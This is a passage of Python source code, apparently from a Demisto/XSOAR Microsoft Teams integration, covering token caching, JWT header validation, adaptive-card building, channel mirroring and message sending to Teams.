:return: Adaptive card object
"""
adaptive_card: dict = {
'contentType': 'application/vnd.microsoft.card.adaptive',
'content': {
'$schema': 'http://adaptivecards.io/schemas/adaptive-card.json',
'version': '1.0',
'type': 'AdaptiveCard',
'body': body
}
}
if actions:
adaptive_card['content']['actions'] = actions
return adaptive_card
def process_tasks_list(data_by_line: list) -> dict:
"""
Processes tasks list assigned to user given from Demisto server and creates adaptive card
:param data_by_line: List of tasks to process
:return: Adaptive card of assigned tasks
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'Task:',
'value': split_data[0]
},
{
'title': 'Incident:',
'value': split_data[1]
},
{
'title': 'Due:',
'value': split_data[2]
},
{
'title': 'Link:',
'value': f'[{split_data[3]}]({split_data[3]})'
}
]
})
return create_adaptive_card(body)
def process_incidents_list(data_by_line: list) -> dict:
"""
Processes incidents list assigned to user given from Demisto server and creates adaptive card
:param data_by_line: List of incidents to process
:return: Adaptive card of assigned incidents
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'ID:',
'value': split_data[0]
},
{
'title': 'Name:',
'value': split_data[1]
},
{
'title': 'Status:',
'value': split_data[2]
},
{
'title': 'Type:',
'value': split_data[3]
},
{
'title': 'Owner:',
'value': split_data[4]
},
{
'title': 'Created:',
'value': split_data[5]
},
{
'title': 'Link:',
'value': f'[{split_data[6]}]({split_data[6]})'
}
]
})
return create_adaptive_card(body)
def process_mirror_or_unknown_message(message: str) -> dict:
"""
Processes mirror investigation command or unknown direct message and creates adaptive card
:param message: The direct message to process
:return: Adaptive card of mirror response / unknown message
"""
body: list = [{
'type': 'TextBlock',
'text': message.replace('\n', '\n\n'),
'wrap': True
}]
return create_adaptive_card(body)
def process_ask_user(message: str) -> dict:
"""
Processes ask user message and creates adaptive card
:param message: The question object
:return: Adaptive card of the question to send
"""
message_object: dict = json.loads(message)
text: str = message_object.get('message_text', '')
entitlement: str = message_object.get('entitlement', '')
options: list = message_object.get('options', [])
investigation_id: str = message_object.get('investigation_id', '')
task_id: str = message_object.get('task_id', '')
body = [
{
'type': 'TextBlock',
'text': text
}
]
actions: list = list()
for option in options:
actions.append({
'type': 'Action.Submit',
'title': option,
'data': {
'response': option,
'entitlement': entitlement,
'investigation_id': investigation_id,
'task_id': task_id
}
})
return create_adaptive_card(body, actions)
def get_bot_access_token() -> str:
"""
Retrieves Bot Framework API access token, either from cache or from Microsoft
:return: The Bot Framework API access token
"""
integration_context: dict = demisto.getIntegrationContext()
access_token: str = integration_context.get('bot_access_token', '')
valid_until: int = integration_context.get('bot_valid_until', int)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
url: str = 'https://login.microsoftonline.com/botframework.com/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'client_secret': BOT_PASSWORD,
'scope': 'https://api.botframework.com/.default'
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response, 'bot')
raise ValueError(f'Failed to get bot access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['bot_access_token'] = access_token
integration_context['bot_valid_until'] = time_now + expires_in
demisto.setIntegrationContext(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get bot access token')
def get_graph_access_token() -> str:
"""
Retrieves Microsoft Graph API access token, either from cache or from Microsoft
:return: The Microsoft Graph API access token
"""
integration_context: dict = demisto.getIntegrationContext()
access_token: str = integration_context.get('graph_access_token', '')
valid_until: int = integration_context.get('graph_valid_until', int)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
tenant_id: str = integration_context.get('tenant_id', '')
if not tenant_id:
raise ValueError(
'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly.'
)
url: str = f'https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'scope': 'https://graph.microsoft.com/.default',
'client_secret': BOT_PASSWORD
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response)
raise ValueError(f'Failed to get Graph access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['graph_access_token'] = access_token
integration_context['graph_valid_until'] = time_now + expires_in
demisto.setIntegrationContext(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get Graph access token')
def http_request(
method: str, url: str = '', json_: dict = None, api: str = 'graph'
) -> Union[dict, list]:
"""
A wrapper for requests lib to send our requests and handle requests and responses better
Headers to be sent in requests
:param method: any restful method
:param url: URL to query
:param json_: HTTP JSON body
:param api: API to query (graph/bot)
:return: requests.json()
"""
if api == 'graph':
access_token = get_graph_access_token()
else: # Bot Framework API
access_token = get_bot_access_token()
headers: dict = {
'Authorization': f'Bearer {access_token}',
'Content-Type': 'application/json',
'Accept': 'application/json'
}
try:
response: requests.Response = requests.request(
method,
url,
headers=headers,
json=json_,
verify=USE_SSL
)
if not response.ok:
error: str = error_parser(response, api)
raise ValueError(f'Error in API call to Microsoft Teams: [{response.status_code}] - {error}')
if response.status_code in {202, 204}:
# Delete channel or remove user from channel return 204 if successful
# Update message returns 202 if the request has been accepted for processing
return {}
if response.status_code == 201:
# For channel creation query, we get a body in the response, otherwise we should just return
if not response.content:
return {}
try:
return response.json()
except ValueError:
raise ValueError(f'Error in API call to Microsoft Teams: {response.text}')
except requests.exceptions.ConnectTimeout:
error_message = 'Connection Timeout Error - potential reason may be that Microsoft Teams is not ' \
'accessible from your host.'
raise ConnectionError(error_message)
except requests.exceptions.SSLError:
error_message = 'SSL Certificate Verification Failed - try selecting \'Trust any certificate\' in ' \
'the integration configuration.'
raise ConnectionError(error_message)
except requests.exceptions.ProxyError:
error_message = 'Proxy Error - if \'Use system proxy settings\' in the integration configuration has been ' \
'selected, try deselecting it.'
raise ConnectionError(error_message)
def integration_health():
bot_framework_api_health = 'Operational'
graph_api_health = 'Operational'
try:
get_bot_access_token()
except ValueError as e:
bot_framework_api_health = f'Non operational - {str(e)}'
try:
get_graph_access_token()
except ValueError as e:
graph_api_health = f'Non operational - {str(e)}'
api_health_output: list = [{
'Bot Framework API Health': bot_framework_api_health,
'Graph API Health': graph_api_health
}]
adi_health_human_readable: str = tableToMarkdown('Microsoft API Health', api_health_output)
mirrored_channels_output = list()
integration_context: dict = demisto.getIntegrationContext()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
mirrored_channels_output.append({
'Team': team.get('team_name'),
'Channel': channel.get('channel_name'),
'Investigation ID': channel.get('investigation_id')
})
mirrored_channels_human_readable: str
if mirrored_channels_output:
mirrored_channels_human_readable = tableToMarkdown(
'Microsoft Teams Mirrored Channels', mirrored_channels_output
)
else:
mirrored_channels_human_readable = 'No mirrored channels.'
demisto.results({
'ContentsFormat': formats['json'],
'Type': entryTypes['note'],
'HumanReadable': adi_health_human_readable + mirrored_channels_human_readable,
'Contents': adi_health_human_readable + mirrored_channels_human_readable
})
def validate_auth_header(headers: dict) -> bool:
"""
Validated authorization header provided in the bot activity object
:param headers: Bot activity headers
:return: True if authorized, else False
"""
parts: list = headers.get('Authorization', '').split(' ')
if len(parts) != 2:
return False
scehma: str = parts[0]
jwt_token: str = parts[1]
if scehma != 'Bearer' or not jwt_token:
demisto.info('Authorization header validation - failed to verify schema')
return False
decoded_payload: dict = jwt.decode(jwt_token, verify=False)
issuer: str = decoded_payload.get('iss', '')
if issuer != 'https://api.botframework.com':
demisto.info('Authorization header validation - failed to verify issuer')
return False
integration_context: dict = demisto.getIntegrationContext()
open_id_metadata: dict = json.loads(integration_context.get('open_id_metadata', '{}'))
keys: list = open_id_metadata.get('keys', [])
unverified_headers: dict = jwt.get_unverified_header(jwt_token)
key_id: str = unverified_headers.get('kid', '')
key_object: dict = dict()
# Check if we got the requested key in cache
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in cache, getting new keys
try:
open_id_url: str = 'https://login.botframework.com/v1/.well-known/openidconfiguration'
response: requests.Response = requests.get(open_id_url, verify=USE_SSL)
if not response.ok:
demisto.info(f'Authorization header validation failed to fetch open ID config - {response.reason}')
return False
response_json: dict = response.json()
jwks_uri: str = response_json.get('jwks_uri', '')
keys_response: requests.Response = requests.get(jwks_uri, verify=USE_SSL)
if not keys_response.ok:
demisto.info(f'Authorization header validation failed to fetch keys - {response.reason}')
return False
keys_response_json: dict = keys_response.json()
keys = keys_response_json.get('keys', [])
open_id_metadata['keys'] = keys
except ValueError:
demisto.info('Authorization header validation - failed to parse keys response')
return False
if not keys:
# Didn't get new keys
demisto.info('Authorization header validation - failed to get keys')
return False
# Find requested key in new keys
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in new keys
demisto.info('Authorization header validation - failed to find relevant key')
return False
endorsements: list = key_object.get('endorsements', [])
if not endorsements or 'msteams' not in endorsements:
demisto.info('Authorization header validation - failed to verify endorsements')
return False
public_key: str = RSAAlgorithm.from_jwk(json.dumps(key_object))
options = {
'verify_aud': False,
'verify_exp': True
}
decoded_payload = jwt.decode(jwt_token, public_key, options=options)
audience_claim: str = decoded_payload.get('aud', '')
if audience_claim != demisto.params().get('bot_id'):
demisto.info('Authorization header validation - failed to verify audience_claim')
return False
integration_context['open_id_metadata'] = json.dumps(open_id_metadata)
demisto.setIntegrationContext(integration_context)
return True
''' COMMANDS + REQUESTS FUNCTIONS '''
def get_team_aad_id(team_name: str) -> str:
"""
Gets Team AAD ID
:param team_name: Team name to get AAD ID of
:return: team AAD ID
"""
integration_context: dict = demisto.getIntegrationContext()
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team_name == team.get('team_name', ''):
return team.get('team_aad_id', '')
url: str = f"{GRAPH_BASE_URL}/beta/groups?$filter=resourceProvisioningOptions/Any(x:x eq 'Team')"
response: dict = cast(Dict[Any, Any], http_request('GET', url))
teams = response.get('value', [])
for team in teams:
if team.get('displayName', '') == team_name:
return team.get('id', '')
raise ValueError('Could not find requested team.')
# def add_member_to_team(user_principal_name: str, team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/groups/{team_id}/members/$ref'
# requestjson_: dict = {
# '@odata.id': f'{GRAPH_BASE_URL}/v1.0/directoryObjects/{user_principal_name}'
# }
# http_request('POST', url, json_=requestjson_)
def get_users() -> list:
"""
Retrieves list of AAD users
:return: List of AAD users
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/users'
users: dict = cast(Dict[Any, Any], http_request('GET', url))
return users.get('value', [])
def add_user_to_channel(team_aad_id: str, channel_id: str, user_id: str):
"""
Request for adding user to channel
"""
url: str = f'{GRAPH_BASE_URL}/beta/teams/{team_aad_id}/channels/{channel_id}/members'
requestjson_: dict = {
'@odata.type': '#microsoft.graph.aadUserConversationMember',
'roles': [],
'user@odata.bind': f'https://graph.microsoft.com/beta/users/{user_id}' # disable-secrets-detection
}
http_request('POST', url, json_=requestjson_)
def add_user_to_channel_command():
"""
Add user to channel (private channel only as still in beta mode)
"""
channel_name: str = demisto.args().get('channel', '')
team_name: str = demisto.args().get('team', '')
member = demisto.args().get('member', '')
users: list = get_users()
user_id: str = str()
found_member: bool = False
for user in users:
if member in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
found_member = True
user_id = user.get('id', '')
break
if not found_member:
raise ValueError(f'User {member} was not found')
team_aad_id = get_team_aad_id(team_name)
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id=None)
add_user_to_channel(team_aad_id, channel_id, user_id)
demisto.results(f'The User "{member}" has been added to channel "{channel_name}" successfully.')
# def create_group_request(
# display_name: str, mail_enabled: bool, mail_nickname: str, security_enabled: bool,
# owners_ids: list, members_ids: list = None
# ) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups'
# data: dict = {
# 'displayName': display_name,
# 'groupTypes': ['Unified'],
# 'mailEnabled': mail_enabled,
# 'mailNickname': mail_nickname,
# 'securityEnabled': security_enabled,
# 'owners@odata.bind': owners_ids,
# 'members@odata.bind': members_ids or owners_ids
# }
# group_creation_response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=data))
# group_id: str = group_creation_response.get('id', '')
# return group_id
#
#
# def create_team_request(group_id: str) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups/{group_id}/team'
# team_creation_response: dict = cast(Dict[Any, Any], http_request('PUT', url, json_={}))
# team_id: str = team_creation_response.get('id', '')
# return team_id
#
#
# def add_bot_to_team(team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_id}/installedApps'
# bot_app_id: str = ''
# data: dict = {
# 'teamsApp@odata.bind': f'https://graph.microsoft.com/v1.0/appCatalogs/teamsApps/{bot_app_id}'
# }
# print(http_request('POST', url, json_=data))
#
#
# def create_team():
# display_name: str = demisto.args().get('display_name', '')
# mail_enabled: bool = bool(strtobool(demisto.args().get('mail_enabled', True)))
# mail_nickname: str = demisto.args().get('mail_nickname', '')
# security_enabled: bool = bool(strtobool(demisto.args().get('security_enabled', True)))
# owners = argToList(demisto.args().get('owner', ''))
# members = argToList(demisto.args().get('members', ''))
# owners_ids: list = list()
# members_ids: list = list()
# users: list = get_users()
# user_id: str = str()
# for member in members:
# found_member: bool = False
# for user in users:
# if member in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_member = True
# user_id = user.get('id', '')
# members_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_member:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {member} was not found',
# 'ContentsFormat': formats['text']
# })
# for owner in owners:
# found_owner: bool = False
# for user in users:
# if owner in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_owner = True
# user_id = user.get('id', '')
# owners_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_owner:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {owner} was not found',
# 'ContentsFormat': formats['text']
# })
# if not owners_ids:
# raise ValueError('Could not find given users to be Team owners.')
# group_id: str = create_group_request(
# display_name, mail_enabled, mail_nickname, security_enabled, owners_ids, members_ids
# )
# team_id: str = create_team_request(group_id)
# add_bot_to_team(team_id)
# demisto.results(f'Team {display_name} was created successfully')
def create_channel(team_aad_id: str, channel_name: str, channel_description: str = '') -> str:
"""
Creates a Microsoft Teams channel
:param team_aad_id: Team AAD ID to create channel in
:param channel_name: Name of channel to create
:param channel_description: Description of channel to create
:return: ID of created channel
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
request_json: dict = {
'displayName': channel_name,
'description': channel_description
}
channel_data: dict = cast(Dict[Any, Any], http_request('POST', url, json_=request_json))
channel_id: str = channel_data.get('id', '')
return channel_id
def create_channel_command():
channel_name: str = demisto.args().get('channel_name', '')
channel_description: str = demisto.args().get('description', '')
team_name: str = demisto.args().get('team', '')
team_aad_id = get_team_aad_id(team_name)
channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
if channel_id:
demisto.results(f'The channel "{channel_name}" was created successfully')
def get_channel_id(channel_name: str, team_aad_id: str, investigation_id: str = None) -> str:
"""
Retrieves Microsoft Teams channel ID
:param channel_name: Name of channel to get ID of
:param team_aad_id: AAD ID of team to search channel in
:param investigation_id: Demisto investigation ID to search mirrored channel of
:return: Requested channel ID
"""
investigation_id = investigation_id or str()
integration_context: dict = demisto.getIntegrationContext()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
if channel.get('channel_name') == channel_name or channel.get('investigation_id') == investigation_id:
return channel.get('channel_id')
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
response: dict = cast(Dict[Any, Any], http_request('GET', url))
channel_id: str = ''
channels: list = response.get('value', [])
for channel in channels:
channel_display_name: str = channel.get('displayName', '')
if channel_display_name == channel_name:
channel_id = channel.get('id', '')
break
if not channel_id:
raise ValueError(f'Could not find channel: {channel_name}')
return channel_id
def get_team_members(service_url: str, team_id: str) -> list:
"""
Retrieves team members given a team
:param team_id: ID of team to get team members of
:param service_url: Bot service URL to query
:return: List of team members
"""
url: str = f'{service_url}/v3/conversations/{team_id}/members'
response: list = cast(List[Any], http_request('GET', url, api='bot'))
return response
def update_message(service_url: str, conversation_id: str, activity_id: str, text: str):
"""
Updates a message in Microsoft Teams channel
:param service_url: Bot service URL to query
:param conversation_id: Conversation ID of message to update
:param activity_id: Activity ID of message to update
:param text: Text to update in the message
:return: None
"""
body = [{
'type': 'TextBlock',
'text': text
}]
adaptive_card: dict = create_adaptive_card(body=body)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
url: str = f'{service_url}/v3/conversations/{conversation_id}/activities/{activity_id}'
http_request('PUT', url, json_=conversation, api='bot')
def close_channel_request(team_aad_id: str, channel_id: str):
"""
Sends an HTTP request to close a Microsoft Teams channel
:param team_aad_id: AAD ID of team to close the channel in
:param channel_id: ID of channel to close
:return: None
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels/{channel_id}'
http_request('DELETE', url)
def close_channel():
"""
Deletes a mirrored Microsoft Teams channel
"""
integration_context: dict = demisto.getIntegrationContext()
channel_name: str = demisto.args().get('channel', '')
investigation: dict = demisto.investigation()
investigation_id: str = investigation.get('id', '')
channel_id: str = str()
team_aad_id: str
mirrored_channels: list
if not channel_name:
# Closing channel as part of autoclose in mirroring process
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_aad_id = team.get('team_aad_id', '')
mirrored_channels = team.get('mirrored_channels', [])
for channel_index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
channel_id = channel.get('channel_id', '')
close_channel_request(team_aad_id, channel_id)
mirrored_channels.pop(channel_index)
team['mirrored_channels'] = mirrored_channels
break
if not channel_id:
raise ValueError('Could not find Microsoft Teams channel to close.')
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
else:
team_name: str = demisto.args().get('team') or demisto.params().get('team')
team_aad_id = get_team_aad_id(team_name)
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
close_channel_request(team_aad_id, channel_id)
demisto.results('Channel was successfully closed.')
def create_personal_conversation(integration_context: dict, team_member_id: str) -> str:
"""
Create a personal conversation with a team member
:param integration_context: Cached object to retrieve relevant data for the conversation creation
:param team_member_id: ID of team member to create a conversation with
:return: ID of created conversation
"""
bot_id: str = demisto.params().get('bot_id', '')
bot_name: str = integration_context.get('bot_name', '')
tenant_id: str = integration_context.get('tenant_id', '')
conversation: dict = {
'bot': {
'id': f'28:{bot_id}',
'name': bot_name
},
'members': [{
'id': team_member_id
}],
'channelData': {
'tenant': {
'id': tenant_id
}
}
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
url: str = f'{service_url}/v3/conversations'
response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=conversation, api='bot'))
return response.get('id', '')
def send_message_request(service_url: str, channel_id: str, conversation: dict):
"""
Sends an HTTP request to send message to Microsoft Teams
:param channel_id: ID of channel to send message in
:param conversation: Conversation message object to send
:param service_url: Bot service URL to query
:return: None
"""
url: str = f'{service_url}/v3/conversations/{channel_id}/activities'
http_request('POST', url, json_=conversation, api='bot')
def process_mentioned_users_in_message(message: str) -> Tuple[list, str]:
"""
Processes the message to include all mentioned users in the right format. For example:
Input: 'good morning @Demisto'
Output (Formatted message): 'good morning <at>@Demisto</at>'
:param message: The message to be processed
:return: A list of the mentioned users, The processed message
"""
mentioned_users: list = [''.join(user) for user in re.findall(MENTION_REGEX, message)]
for user in mentioned_users:
message = message.replace(f'@{user};', f'<at>@{user}</at>')
return mentioned_users, message
def mentioned_users_to_entities(mentioned_users: list, integration_context: dict) -> list:
"""
Returns a list of entities built from the mentioned users
:param mentioned_users: A list of mentioned users in the message
:param integration_context: Cached object to retrieve relevant data from
:return: A list of entities
"""
return [{'type': 'mention', 'mentioned': {'id': get_team_member_id(user, integration_context), 'name': user},
'text': f'<at>@{user}</at>'} for user in mentioned_users]
def send_message():
message_type: str = demisto.args().get('messageType', '')
original_message: str = demisto.args().get('originalMessage', '')
message: str = demisto.args().get('message', '')
try:
adaptive_card: dict = json.loads(demisto.args().get('adaptive_card', '{}'))
except ValueError:
raise ValueError('Given adaptive card is not in valid JSON format.')
if message_type == MESSAGE_TYPES['mirror_entry'] and ENTRY_FOOTER in original_message:
# Got a message which was already mirrored - skipping it
return
channel_name: str = demisto.args().get('channel', '')
if (not channel_name and message_type in {MESSAGE_TYPES['status_changed'], MESSAGE_TYPES['incident_opened']}) \
or channel_name == INCIDENT_NOTIFICATIONS_CHANNEL:
# Got a notification from server
channel_name = demisto.params().get('incident_notifications_channel', 'General')
severity: int = int(demisto.args().get('severity'))
severity_threshold: int = translate_severity(demisto.params().get('min_incident_severity', 'Low'))
if severity < severity_threshold:
return
team_member: str = demisto.args().get('team_member', '')
if not (team_member or channel_name):
raise ValueError('No channel or team member to send message were provided.')
if team_member and channel_name:
raise ValueError('Provide either channel or team member to send message to, not both.')
if not (message or adaptive_card):
raise ValueError('No message or adaptive card to send were provided.')
if message and adaptive_card:
raise ValueError('Provide either message or adaptive to send, not both.')
integration_context: dict = demisto.getIntegrationContext()
channel_id: str = str()
personal_conversation_id: str = str()
if channel_name:
team_name: str = demisto.args().get('team', '') or demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
investigation_id: str = str()
if message_type == MESSAGE_TYPES['mirror_entry']:
# Got an entry from the War Room to mirror to Teams
# Getting investigation ID in case channel name is custom and not the default
investigation: dict = demisto.investigation()
investigation_id = investigation.get('id', '')
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id)
elif team_member:
team_member_id: str = get_team_member_id(team_member, integration_context)
personal_conversation_id = create_personal_conversation(integration_context, team_member_id)
recipient: str = channel_id or personal_conversation_id
conversation: dict
if message:
entitlement_match: Optional[Match[str]] = re.search(ENTITLEMENT_REGEX, message)
if entitlement_match:
# In TeamsAsk process
adaptive_card = process_ask_user(message)
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
else:
# Sending regular message
formatted_message: str = urlify_hyperlinks(message)
mentioned_users, formatted_message_with_mentions = process_mentioned_users_in_message(formatted_message)
entities = mentioned_users_to_entities(mentioned_users, integration_context)
demisto.info(f'msg: {formatted_message_with_mentions}, ent: {entities}')
conversation = {
'type': 'message',
'text': formatted_message_with_mentions,
'entities': entities
}
else: # Adaptive card
conversation = {
'type': 'message',
'attachments': [adaptive_card]
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, recipient, conversation)
demisto.results('Message was sent successfully.')
def mirror_investigation():
"""
Updates the integration context with a new or existing mirror.
"""
investigation: dict = demisto.investigation()
if investigation.get('type') == PLAYGROUND_INVESTIGATION_TYPE:
raise ValueError('Can not perform this action in playground.')
integration_context: dict = demisto.getIntegrationContext()
mirror_type: str = demisto.args().get('mirror_type', 'all')
auto_close: str = demisto.args().get('autoclose', 'true')
mirror_direction: str = demisto.args().get('direction', 'both').lower()
team_name: str = demisto.args().get('team', '')
if not team_name:
team_name = demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
mirrored_channels: list = list()
teams: list = json.loads(integration_context.get('teams', '[]'))
team: dict = dict()
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
if team.get('mirrored_channels'):
mirrored_channels = team['mirrored_channels']
break
if mirror_direction != 'both':
mirror_type = f'{mirror_type}:{mirror_direction}'
investigation_id: str = investigation.get('id', '')
investigation_mirrored_index: int = is_investigation_mirrored(investigation_id, mirrored_channels)
if investigation_mirrored_index > -1:
# Updating channel mirror configuration
mirrored_channels[investigation_mirrored_index]['mirror_type'] = mirror_type
mirrored_channels[investigation_mirrored_index]['mirror_direction'] = mirror_direction
mirrored_channels[investigation_mirrored_index]['auto_close'] = auto_close
mirrored_channels[investigation_mirrored_index]['mirrored'] = False
demisto.results('Investigation mirror was updated successfully.')
else:
channel_name: str = demisto.args().get('channel_name', '') or f'incident-{investigation_id}'
channel_description: str = f'Channel to mirror incident {investigation_id}'
channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
service_url: str = integration_context.get('service_url', '')
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
warroom_link: str = f'{server_link}#/WarRoom/{investigation_id}'
conversation: dict = {
'type': 'message',
'text': f'This channel was created to mirror [incident {investigation_id}]({warroom_link}) '
f'between Teams and Demisto. In order for your Teams messages to be mirrored in Demisto, '
f'you need to mention the Demisto Bot in the message.'
}
send_message_request(service_url, channel_id, conversation)
mirrored_channels.append({
'channel_id': channel_id,
'investigation_id': investigation_id,
'mirror_type': mirror_type,
'mirror_direction': mirror_direction,
'auto_close': auto_close,
'mirrored': False,
'channel_name': channel_name
})
demisto.results(f'Investigation mirrored successfully in channel {channel_name}.')
team['mirrored_channels'] = mirrored_channels
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
def channel_mirror_loop():
"""
Runs in a long running container - checking for newly mirrored investigations.
"""
while True:
found_channel_to_mirror: bool = False
integration_context = demisto.getIntegrationContext()
try:
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels = team.get('mirrored_channels', [])
channel: dict
for channel in mirrored_channels:
investigation_id = channel.get('investigation_id', '')
if not channel['mirrored']:
demisto.info(f'Mirroring incident: {investigation_id} in Microsoft Teams')
channel_to_update: dict = channel
if channel_to_update['mirror_direction'] and channel_to_update['mirror_type']:
demisto.mirrorInvestigation(
channel_to_update['investigation_id'],
channel_to_update['mirror_type'],
bool(strtobool(channel_to_update['auto_close']))
)
channel_to_update['mirrored'] = True
demisto.info(f'Mirrored incident: {investigation_id} to Microsoft Teams successfully')
else:
demisto.info(f'Could not mirror {investigation_id}')
team['mirrored_channels'] = mirrored_channels
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
found_channel_to_mirror = True
break
if found_channel_to_mirror:
break
except json.decoder.JSONDecodeError as json_decode_error:
demisto.error(
f'An error occurred in channel mirror loop while trying to deserialize teams from cache: '
f'{str(json_decode_error)}'
)
demisto.debug(f'Cache object: {integration_context}')
demisto.updateModuleHealth(f'An error occurred: {str(json_decode_error)}')
except Exception as e:
demisto.error(f'An error occurred in channel mirror loop: {str(e)}')
demisto.updateModuleHealth(f'An error occurred: {str(e)}')
finally:
time.sleep(5)
def member_added_handler(integration_context: dict, request_body: dict, channel_data: dict):
"""
Handles member added activity
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:return: None
"""
bot_id = demisto.params().get('bot_id')
team: dict = channel_data.get('team', {})
team_id: str = team.get('id', '')
team_aad_id: str = team.get('aadGroupId', '')
team_name: str = team.get('name', '')
tenant: dict = channel_data.get('tenant', {})
tenant_id: str = tenant.get('id', '')
recipient: dict = request_body.get('recipient', {})
recipient_name: str = recipient.get('name', '')
members_added: list = request_body.get('membersAdded', [])
teams: list = json.loads(integration_context.get('teams', '[]'))
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
for member in members_added:
member_id = member.get('id', '')
if bot_id in member_id:
# The bot was added to a team, caching team ID and team members
demisto.info(f'The bot was added to team {team_name}')
integration_context['tenant_id'] = tenant_id
integration_context['bot_name'] = recipient_name
break
team_members: list = get_team_members(service_url, team_id)
found_team: bool = False
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
team['team_members'] = team_members
found_team = True
break
if not found_team:
# Didn't found an existing team, adding new team object
teams.append({
'team_aad_id': team_aad_id,
'team_id': team_id,
'team_name': team_name,
'team_members': team_members
})
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
def direct_message_handler(integration_context: dict, request_body: dict, conversation: dict, message: str):
"""
Handles a direct message sent to the bot
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param conversation: Conversation object sent
:param message: The direct message sent
:return: None
"""
conversation_id: str = conversation.get('id', '')
from_property: dict = request_body.get('from', {})
user_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, user_id)
username: str = team_member.get('username', '')
user_email: str = team_member.get('user_email', '')
formatted_message: str = str()
attachment: dict = dict()
return_card: bool = False
allow_external_incidents_creation: bool = demisto.params().get('allow_external_incidents_creation', False)
lowered_message = message.lower()
if lowered_message.find('incident') != -1 and (lowered_message.find('create') != -1
or lowered_message.find('open') != -1
or lowered_message.find('new') != -1):
if user_email:
demisto_user = demisto.findUser(email=user_email)
else:
demisto_user = demisto.findUser(username=username)
if not demisto_user and not allow_external_incidents_creation:
data = 'You are not allowed to create incidents.'
else:
data = process_incident_create_message(demisto_user, message)
formatted_message = urlify_hyperlinks(data)
else:
try:
data = demisto.directMessage(message, username, user_email, allow_external_incidents_creation)
return_card = True
